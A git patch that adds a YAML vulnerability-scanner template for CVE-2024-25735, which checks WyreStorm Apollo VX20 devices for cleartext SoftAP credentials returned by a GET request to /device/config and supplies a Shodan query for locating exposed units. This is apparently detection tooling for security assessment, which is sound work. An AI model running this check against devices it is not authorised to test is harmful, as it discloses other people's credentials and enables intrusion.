From 4e9c4bc7b6d478ef5783bd23eec2b8c1f8768434 Mon Sep 17 00:00:00 2001
From: johnk3r <johnatan2camargo@gmail.com>
Date: Mon, 12 Feb 2024 19:32:40 -0300
Subject: [PATCH] Create CVE-2024-25735.yaml

---
 http/cves/2024/CVE-2024-25735.yaml | 31 ++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-25735.yaml

diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml
new file mode 100644
index 0000000000..25ff442e91
--- /dev/null
+++ b/http/cves/2024/CVE-2024-25735.yaml
@@ -0,0 +1,31 @@
+id: CVE-2024-25735
+info:
+  name: WyreStorm Apollo VX20 - Incorrect Access Control
+  author: johnk3r
+  severity: high
+  description: An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
+  reference:
+    - https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
+  classification:
+    cvss-metrics: AV:N/AC:L/Au:N/C:C/I:C/A:C
+    cvss-score: 10.0
+    cwe-id: CWE-94
+    cve-id: CVE-2024-25735
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: WyreStorm
+    product: Apollo VX20
+    shodan-query: ssl:"WyreStorm Apollo VX20"
+  tags: cve,cve2024,wyrestorm
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/device/config"
+
+    matchers:
+      - type: word
+        words:
+          - "password"
+          - "softAp"